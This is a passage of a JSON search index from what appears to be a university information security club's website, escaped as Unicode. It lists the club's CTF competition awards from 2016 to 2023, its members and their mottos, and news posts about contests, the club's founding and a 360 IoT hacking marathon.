2023\u5e74\u798f\u5efa\u7701\u7b2c\u56db\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff08\u9ed1\u76fe\u5168\u56fd\u5927\u5b66\u751f\u8d5b\u9053\uff09\u521d\u8d5b\u5168\u7701\u7b2c\u4e00/\u51b3\u8d5b\u4e09\u7b49\u5956\uff08\u4e0b\u534a\u573a\u5165\u573a\uff09 \u5730\u70b9\uff1a\u798f\u5efa\uff0c\u798f\u5dde [2023/05/xx-06-xx] - \u67d0\u884c\u52a8\uff0c\u4fdd\u5bc6 [2023/05/29] - 2023\u5e74\u7b2c\u516b\u5c4a\u4e0a\u6d77\u5e02\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b\u66a8\u201c\u78d0\u77f3\u884c\u52a8\u201d2023\uff08\u9996\u5c4a\uff09\u5927\u5b66\u751f\u7f51\u7edc\u5b89\u5168\u653b\u9632\u8d5b \u7b2c24\u540d \u5730\u70b9\uff1a\u80fd\u8fdb\u7ebf\u4e0b\uff0c\u4f46\u7ecf\u8d39\u4e0d\u591f\uff0c\u6240\u4ee5\u5c31\u6ca1\u53bb\u4e86\uff08 [2023/05/06] - 2023\u5e74\u9996\u5c4a\u201c\u76d8\u53e4\u77f3\u676f\u201d\u5168\u56fd\u7535\u5b50\u6570\u636e\u53d6\u8bc1\u5927\u8d5b \u7b2c61\u540d\uff08\u5dee1\u540d\u8fdb\u7ebf\u4e0b\uff09 \u5730\u70b9\uff1a\u7ebf\u4e0a\uff0c\u5982\u679c\u8fdb\u7684\u8bdd\u5c31\u80fd\u53bb\u5357\u4eac\u4e86\uff0c\u8fd9\u6ce2\u662f\u8bbe\u5907\u95ee\u9898 [2023/04/14] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u5168\u56fd\u603b\u51b3\u8d5b\uff0838/50\uff0cCodeMonster\uff09\uff0cx1aoB1n \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde [2023/04/14] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 
\u534a\u51b3\u8d5b\uff0813/109\u540d\uff0cCodeMonster\uff09\uff0c\u664b\u7ea7\u603b\u51b3\u8d5b \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde [2023/01/10] - 2023\u5e74\u7b2c\u56db\u5c4a\u201c\u957f\u57ce\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e00\u8d5b\u533a\uff0c\u56e2\u4f53\u4e09\u7b49\u5956 \uff08FUCK U, COVID-19/\ud83d\udc47\uff09
"},{"location":"award/#2022","title":"2022","text":" [2022/10/??] - 2022\u5e74\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u5ba3\u4f20\u5468\u798f\u5efa\u7701\u7b2c\u4e09\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\uff08\u9ed1\u76fe\u8d5b\u9053\uff09 \u4f18\u79c0\u5956\uff08CodeMonster/XMUTSEC\uff09 \u5730\u70b9\uff1a\u798f\u5dde [2022/09/22] - \u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\uff08\u798f\u5efa\u7701\u9009\u62d4\u8d5b\uff09\u66a8\u798f\u5efa\u7701\u7b2c\u4e8c\u5c4a\u5de5\u4e1a\u4e92\u8054\u7f51\u521b\u65b0\u5927\u8d5b \u4e2a\u4eba\u91d1\u724c \u5730\u70b9\uff1a\u798f\u5dde [2022/08/??] - 2022\u5e74\u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u664b\u7ea7\u534a\u51b3\u8d5b \u7ebf\u4e0a [2022/09/22] - \u4e2d\u56fd\u5de5\u4e1a\u4e92\u8054\u7f51\u5b89\u5168\u5927\u8d5b\uff08\u798f\u5efa\u7701\u9009\u62d4\u8d5b\uff09\u66a8\u798f\u5efa\u7701\u7b2c\u4e8c\u5c4a\u5de5\u4e1a\u4e92\u8054\u7f51\u521b\u65b0\u5927\u8d5b \u56e2\u4f53\u4e8c\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2022/08/??] 
- \u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u2014\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b\u603b\u51b3\u8d5b \u56e2\u4f53\u4e09\u7b49\u5956 \u7ebf\u4e0a [2022/06/28] - \u7b2c\u5341\u4e94\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u5b9e\u8df5\u80fd\u529b\u8d5b \u534e\u4e1c\u5357\u8d5b\u533a \u56e2\u4f53\u4e00\u7b49\u5956 \u7ebf\u4e0a "},{"location":"award/#2021","title":"2021","text":" [2021/12/08] - \u7b2c\u4e8c\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u6559\u80b2\u884c\u4e1a\u653b\u9632\u8d5b\u9053\uff0c\u9632\u5b88\u65b9\u7b2c\u4e00\u540d \u7ebf\u4e0a [2021/12/08] - \u7b2c\u4e8c\u5c4a\u201c\u95fd\u76fe\u676f\u201d\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u9ed1\u76fe\u8d5b\u9053\uff0c\u9ad8\u6821\u7ec4\u7b2c\u4e09\u540d\u3001\u7b2c\u4e09\u540d \u5730\u70b9\uff1a\u798f\u5dde \uff08FUCK U, COVID-19/\ud83d\udc46\uff09
"},{"location":"award/#2020","title":"2020","text":" [2020/??/??] - \u798f\u5efa\u7701\u9ed1\u76fe\u676f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e00\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2020/??/??] - \u7f51\u9f0e\u676f\u7f51\u7edc\u5b89\u5168\u5927\u8d5b \u9752\u9f99\u7ec4 \u664b\u7ea7\u534a\u51b3\u8d5b \u5730\u70b9\uff1a\u6d59\u6c5f\uff0c\u676d\u5dde "},{"location":"award/#2019","title":"2019","text":" [2019/??/??] - X-NUCA \u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b \u7b2c 23 \u540d [2019/??/??] - \u798f\u5efa\u7701\u9ed1\u76fe\u676f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u7279\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2019/??/??] - \u5168\u56fd\u8f6f\u4ef6\u6d4b\u8bd5\u5927\u8d5b Web \u5b89\u5168\u6d4b\u8bd5\u4e2a\u4eba\u8d5b\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956 [2019/??/??] - \u5168\u56fd\u8f6f\u4ef6\u6d4b\u8bd5\u5927\u8d5b Web \u5b89\u5168\u6d4b\u8bd5\u4e2a\u4eba\u8d5b\u7701\u8d5b \u4e00\u7b49\u5956 [2019/??/??] - \u7b2c\u5341\u4e8c\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u80fd\u529b\u5b9e\u8df5\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u56db\u5ddd\uff0c\u6210\u90fd\u5e02\u6210\u534e\u533a\u5efa\u8bbe\u5317\u8def\u4e00\u6bb558\u53f7\u4e16\u8302\u6210\u90fd\u8302\u5fa1\u9152\u5e97\uff084F\u5927\u5bb4\u4f1a\u5385\uff09 [2019/??/??] - \u7b2c\u5341\u4e8c\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b\u521b\u65b0\u80fd\u529b\u5b9e\u8df5\u8d5b\u534e\u4e1c\u5357\u8d5b\u533a\u534a\u51b3\u8d5b \u7279\u7b49\u5956 \u5730\u70b9\uff1a\u6c5f\u82cf\uff0c\u82cf\u5dde\u5e02\u59d1\u82cf\u533a\u5e73\u6c5f\u65b0\u57ce\u82cf\u7ad9\u8def1588\u53f7\uff0c\u7ef4\u4e5f\u7eb3\u9152\u5e97\uff08\u82cf\u5dde\u706b\u8f66\u7ad9\u5317\u5e7f\u573a\u5e97\uff09\u4e09\u697c\u8096\u90a6\u5385 [2019/??/??] 
- \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e94\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u798f\u5dde [2019/??/??] - \u9ad8\u6821\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u7ba1\u7406\u8fd0\u7ef4\u6311\u6218\u8d5b \u4e09\u7b49\u5956 \u5730\u70b9\uff1a\u897f\u5b89 [2019/??/??] - \u201c\u9ec4\u9e64\u676f\u201d\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u4e0e\u521b\u65b0\u5cf0\u4f1a\u66a8\u7f51\u7edc\u5b89\u5168\u670d\u52a1\u4e0e\u521b\u65b0\u80fd\u529b\u5927\u8d5b \u4f18\u79c0\u5956 \u5730\u70b9\uff1a\u6b66\u6c49 [2019/??/??] - \u897f\u6e56\u8bba\u5251\u4e2d\u56fd\u676d\u5dde\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f18\u79c0\u5956 \u5730\u70b9\uff1a\u6d59\u6c5f "},{"location":"award/#2018","title":"2018","text":" [2018/12/28] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2018/12/07] - \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u5317\u4eac\uff0c\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66 [2018/06/09] - \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u6c5f\u82cf\uff0c\u82cf\u5dde\u5e02\u4f1a\u8bae\u4e2d\u5fc3 [2018/05/11] - 2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2018/04/26] - 2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u6d59\u6c5f\u676d\u5dde\u56fd\u9645\u535a\u89c8\u4e2d\u5fc3 [2018/03/10] - *CTF 2018 97th 
[2018/03/10] - N1CTF 2018 83th [2018/??/??] - HITB-XCTF GSEC CTF 2018 Final\uff08Member\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u65b0\u52a0\u5761\uff08Singapore\uff09\uff0cNational University of Singapore "},{"location":"award/#2017","title":"2017","text":" [2017/11/26] - \u7b2c\u56db\u5c4a\u201c\u9ed1\u76fe\u676f\u201d\u4fe1\u606f\u5b89\u5168\u7ade\u8d5b \u4e00\u7b49\u5956\uff08\u5168\u7701\u7b2c\u4e8c\u540d\uff09 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/11/23] - 360 SRC\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\uff08\u798f\u5dde\u7ad9\uff09 \u7efc\u5408\u79ef\u5206\u7b2c4\u540d [2017/11/10] - HCTF 2017 58th \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/10/27] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2017/04/22] - 2017\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u534e\u5357\u8d5b\u533a\u201c\u6606\u4ed1\u4e2d\u9510\u676f\u201d\u4f01\u4e1a\u8d5b \u51a0\u519b \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde\uff0c\u798f\u5dde\u5927\u5b66 "},{"location":"award/#2016","title":"2016","text":" [2016/12/11] - \u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956 \u7ebf\u4e0b\u5730\u70b9\uff1a\u798f\u5dde [2016/06/09] - \u534f\u4f1a\u6210\u7acb "},{"location":"member/","title":"\u534f\u4f1a\u6210\u5458","text":""},{"location":"member/#2021-2022","title":"2021-2022","text":" rYu1nser (IceCliffs) - \u95dc\u6ce8\u6771\u96ea\u84ee\u8b1d\u8b1d\u55b5\uff0c\u95dc\u6ce8\u6771\u96ea\u84ee\u8b1d\u8b1d\u55b5\uff0821-22\u534f\u4f1a\u4f1a\u957f\uff09 "},{"location":"member/#2020-2021","title":"2020-2021","text":" me7eorite - \uff08\u795e\uff09 x1aoB1n\uff08\u7c73\u536b\u5175\uff09 - 
\u539f\u795e60\u7ea7+\u661f\u7a79\u94c1\u905370\u7ea7\uff0820-21\u534f\u4f1a\u4f1a\u957f\uff09 \u6843\u5b50\u4e4c\u9f99 whisper "},{"location":"member/#2019-2020","title":"2019-2020","text":""},{"location":"member/#2018-2019","title":"2018-2019","text":" White - \u4e0d\u53ef\u7ed3\u7f18 \u5f92\u589e\u5bc2\u5bde Alienworm - \u8fd8\u6ca1\u627e\u5230\u95e8\u7684ctf\u9009\u624b Southseast - \u8346\u68d8\u523a\u7a7f\u6211\u7684\u811a\u638c\u8def\u574e\u5777\u800c\u6f2b\u957f\u3002 Cosmos - \u4eba\u751f\u5982\u9006\u65c5,\u6211\u4ea6\u662f\u884c\u4eba\u3002 Nepire - \u53a6\u822a\u516c\u5b50:\u4e00\u4efd\u4ee3\u7801\u5343\u4e24\u884c,\u79d1\u5b66\u4e0a\u7f51\u6211\u6700\u5f3a,\u8d5b\u540e\u79d2\u9898\u7406\u6c14\u58ee,\u633a\u8fdb\u51b3\u8d5b\u558a\u51c9\u51c9\u3002 \u8c46\u6d46\u6cb9\u6761 - \u5fd7\u5728\u5c71\u9876\u7684\u4eba\uff0c\u4e0d\u4f1a\u8d2a\u5ff5\u5c71\u8170\u7684\u98ce\u666f\u3002 SweetPotato - \u6211\u80fd\u541e\u4e0b\u73bb\u7483\u800c\u4e0d\u4f24\u8eab\u4f53 "},{"location":"member/#2017-2018","title":"2017-2018","text":" Sheldon - \u4eba\u751f\u4e0d\u5982\u610f,\u5341\u6709\u516b\u4e5d\uff0817-18\u534f\u4f1a\u4f1a\u957f\uff09 Saltyfishy - \u4eba\u5982\u679c\u6ca1\u6709\u68a6\u60f3\uff0c\u90a3\u53ef\u592a\u8212\u670d\u4e86\uff01 \u5f20\u52a8\u4e4b - \u5165\u95e8\u7ea7ctf\u9009\u624b "},{"location":"member/#2016-2017","title":"2016-2017","text":" PeterZ - \u4e00\u53ea\u6c89\u8ff7\u4ee3\u7801\u7684\u81ea\u7531\u9e70\uff08\u534f\u4f1a\u521b\u59cb\u4eba\uff0c16-17\u534f\u4f1a\u4f1a\u957f\uff09 Xishir - A code monster.\uff08\u534f\u4f1a\u521b\u59cb\u4eba\uff0c16-18\u534f\u4f1a\u526f\u4f1a\u957f\uff09 l1nk3r - \u613f\u4f60\u51fa\u8d70\u534a\u751f\u5f52\u6765\u4ecd\u662f\u5c11\u5e74 backCover7 - Light up the Night! Jaken - River flows in you. \u6ce1\u9762 - \u552f\u5229\u662f\u56fe ju5tw4nty0u - Nothing is impossible to a willing heart. 
"},{"location":"posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956","text":"\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u53c8\u6709\u4e86\u65b0\u52a8\u5411\u300212\u67087\u65e5\uff0c2017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u603b\u51b3\u8d5b\u5728\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66\u76db\u5927\u5f00\u5e55\uff0c\u6765\u81ea\u5168\u56fd57\u6240\u9ad8\u6821\u7684\u7f51\u7edc\u5b89\u5168\u5b9e\u6218\u8d5b\u961f\u5728\u201c\u6570\u636e\u8d5b\u3001\u4f01\u4e1a\u8d5b\u3001\u4e2a\u4eba\u8d5b\u201c\u4e09\u4e2a\u65b9\u5411\u6bd4\u8d5b\u4e2d\u4e00\u51b3\u9ad8\u4e0b\uff0c\u4e3a\u5168\u56fd\u7f51\u7edc\u5b89\u5168\u5e02\u573a\u63d0\u4f9b\u4e86\u65b0\u4e00\u6279\u9ad8\u7aef\u4eba\u624d\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u4e09\u593a\u5f97\u4e00\u7b49\u5956
\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/","title":"\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6210\u7acb","text":"\u672c\u534f\u4f1a\u6210\u7acb\u4e8e2016\u5e746\u67089\u65e5
\uff0c\u81f4\u529b\u4e8e\u5bf9\u4fe1\u606f\u5b89\u5168
\u65b9\u9762\u7684\u63a2\u7d22\u4e0e\u521b\u65b0\uff0c\u65e8\u5728\u4e3a\u6211\u6821\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u63d0\u4f9b\u4e00\u4e2a\u4ea4\u6d41\u5e73\u53f0\uff0c\u6269\u5927\u4fe1\u606f\u5b89\u5168\u5728\u6211\u6821\u7684\u5f71\u54cd\u529b\u3002
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#_1","title":"\u534f\u4f1a\u6d3b\u52a8","text":"\u672c\u534f\u4f1a\u901a\u8fc7\u53c2\u52a0CTF
\u7ade\u8d5b\u7684\u5f62\u5f0f\u9a8c\u8bc1\u81ea\u5df1\u7684\u4fe1\u606f\u5b89\u5168\u6280\u672f\u6c34\u5e73 \u5404\u4f4d\u5927\u4f6c\u548c\u840c\u65b0\u53ef\u4ee5\u53bb\u534f\u4f1aCodeMonster
\u6218\u961f\u4e0e\u96c6\u7f8e\u5927\u5b66\u4fe1\u5b89\u534f\u4f1a\u7684Mokirin
\u6218\u961f\u5171\u540c\u642d\u5efa\u7ef4\u62a4\u7684MOCTF\u5e73\u53f0\u8fdb\u884c\u65e5\u5e38CTF\u5237\u9898\u3002
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#ctf","title":"CTF\u4ecb\u7ecd","text":"CTF
\uff08Capture The Flag\uff09\u4e2d\u6587\u4e00\u822c\u8bd1\u4f5c\u593a\u65d7\u8d5b\uff0c\u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u6307\u7684\u662f\u7f51\u7edc\u5b89\u5168\u6280\u672f\u4eba\u5458\u4e4b\u95f4\u8fdb\u884c\u6280\u672f\u7ade\u6280\u7684\u4e00\u79cd\u6bd4\u8d5b\u5f62\u5f0f\u3002CTF\u8d77\u6e90\u4e8e1996\u5e74DEFCON\u5168\u7403\u9ed1\u5ba2\u5927\u4f1a\uff0c\u4ee5\u4ee3\u66ff\u4e4b\u524d\u9ed1\u5ba2\u4eec\u901a\u8fc7\u4e92\u76f8\u53d1\u8d77\u771f\u5b9e\u653b\u51fb\u8fdb\u884c\u6280\u672f\u6bd4\u62fc\u7684\u65b9\u5f0f\u3002\u53d1\u5c55\u81f3\u4eca\uff0c\u5df2\u7ecf\u6210\u4e3a\u5168\u7403\u8303\u56f4\u7f51\u7edc\u5b89\u5168\u5708\u6d41\u884c\u7684\u7ade\u8d5b\u5f62\u5f0f\uff0c2013\u5e74\u5168\u7403\u4e3e\u529e\u4e86\u8d85\u8fc7\u4e94\u5341\u573a\u56fd\u9645\u6027CTF\u8d5b\u4e8b\u3002\u800cDEFCON\u4f5c\u4e3aCTF\u8d5b\u5236\u7684\u53d1\u6e90\u5730\uff0cDEFCON CTF\u4e5f\u6210\u4e3a\u4e86\u76ee\u524d\u5168\u7403\u6700\u9ad8\u6280\u672f\u6c34\u5e73\u548c\u5f71\u54cd\u529b\u7684CTF\u7ade\u8d5b\uff0c\u7c7b\u4f3c\u4e8eCTF\u8d5b\u573a\u4e2d\u7684\u201c\u4e16\u754c\u676f\u201d \u3002 CTF\u5927\u81f4\u6d41\u7a0b\u662f\uff0c\u53c2\u8d5b\u56e2\u961f\u4e4b\u95f4\u901a\u8fc7\u8fdb\u884c\u653b\u9632\u5bf9\u6297\u3001\u7a0b\u5e8f\u5206\u6790\u7b49\u5f62\u5f0f\uff0c\u7387\u5148\u4ece\u4e3b\u529e\u65b9\u7ed9\u51fa\u7684\u6bd4\u8d5b\u73af\u5883\u4e2d\u5f97\u5230\u4e00\u4e32\u5177\u6709\u4e00\u5b9a\u683c\u5f0f\u7684\u5b57\u7b26\u4e32\u6216\u5176\u4ed6\u5185\u5bb9\uff0c\u5e76\u5c06
","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6d1aa499-57ee-401b-a911-8062c6cae869/","title":"360\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7b2c\u56db\u540d","text":"\u5317\u4eac\u65f6\u95f411\u670823\u65e5\uff0c\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u4e8e\u798f\u5dde\u6b63\u5f0f\u5f00\u6218\u3002\u4f5c\u4e3a\u4e00\u9879\u5bf9\u4ea7\u54c1\u5b89\u5168\u4e25\u683c\u8981\u6c42\u3001\u5411\u9ed1\u5ba2\u7cbe\u795e\u6781\u81f4\u8ffd\u9010\u3001\u7ed9\u4e88\u53c2\u8d5b\u9009\u624b\u9ad8\u989d\u5956\u52b1\u7684\u9ed1\u5ba2\u8d5b\u4e8b\uff0c\u672c\u5c4a\u9ed1\u5ba2\u9a6c\u62c9\u677e\u5438\u5f15\u4e86\u6765\u81ea\u5168\u56fd\u8fd110\u652f\u5b66\u751f\u9ed1\u5ba2\u6218\u961f\u53c2\u8d5b\uff0c\u5176\u4e2d\u5305\u62ec\u6765\u81ea\u53f0\u6e7e\u5730\u533a\u7684BambooFox\u548cTDOH\u4e24\u652f\u6218\u961f\u3002
48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7531360\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u4e3b\u529e\u7684\u9762\u5411360\u516c\u53f8IoT\u8bbe\u5907\u7684\u6f0f\u6d1e\u5956\u52b1\u8d5b\u4e8b\uff0c\u8bbe\u7f6e\u4e8636\u4e07\u4eba\u6c11\u5e01\u5956\u91d1\u6c60\uff0c\u5355\u4e2a\u6f0f\u6d1e\u5956\u52b1\u6700\u9ad8\u53ef\u8fbe5\u4e07\u5143\u3002
\u5c11\u5e74\u90ce\u5251\u8bd5\u5929\u4e0b\n
\u9ed1\u5ba2\u9a6c\u62c9\u677e\u6982\u5ff5\u6e90\u81ea\u7f8e\u56fd\uff0c\u5f53\u4e00\u7fa4\u9ad8\u624b\u4e91\u96c6\u4e00\u5802\uff0c\u4e92\u76f8\u6c9f\u901a\u548c\u5b66\u4e60\uff0c\u8fd9\u5c31\u6210\u4e86\u201d\u4e16\u754c\u4e0a\u6700\u9177\u7684\u6280\u672f\u72c2\u6b22\u201d\u3002\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u8d5b\u91c7\u7528\u4e8648\u5c0f\u65f6\u6781\u9650\u6f0f\u6d1e\u6316\u6398\u548c\u7834\u89e3\u76ee\u6807\u968f\u673a\u9009\u5b9a\u7684\u8d5b\u5236\uff0c\u53c2\u8d5b\u9009\u624b\u9700\u8981\u5728\u6bd4\u8d5b\u671f\u95f4\u8fde\u7eed\u4e0d\u4e2d\u65ad\u5730\u5bf9\u7279\u5b9a\u4ea7\u54c1\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u6bcf\u961f\u53ea\u914d\u5907\u4e00\u95f4\u4f11\u606f\u5ba4\u4ee5\u4f9b\u9009\u624b\u201c\u56de\u8840\u201d\u3002\u5728\u8fd9\u6837\u77ed\u7684\u65f6\u95f4\u5185\u5bfb\u627e\u7531\u5b89\u5168\u4eba\u5458\u53cd\u590d\u628a\u5173\u7684\u4ea7\u54c1\u6f0f\u6d1e\uff0c\u5e76\u975e\u6613\u4e8b\u3002\u4e0d\u8fc7\uff0c\u6ca1\u6709\u7edd\u5bf9\u5b89\u5168\u7684\u7cfb\u7edf\uff0c\u6211\u4eec\u4e5f\u5728\u671f\u5f85\u7740\u4ed6\u4eec\u7684\u7cbe\u5f69\u8868\u73b0\uff0c\u4e3a\u63d0\u5347360\u4ea7\u54c1\u5b89\u5168\u6027\u800c\u5927\u5c55\u8eab\u624b\uff01
\u9ed1\u4e0d\u662f\u76ee\u7684\uff0c\u5b89\u5168\u624d\u662f\u738b\u9053\n
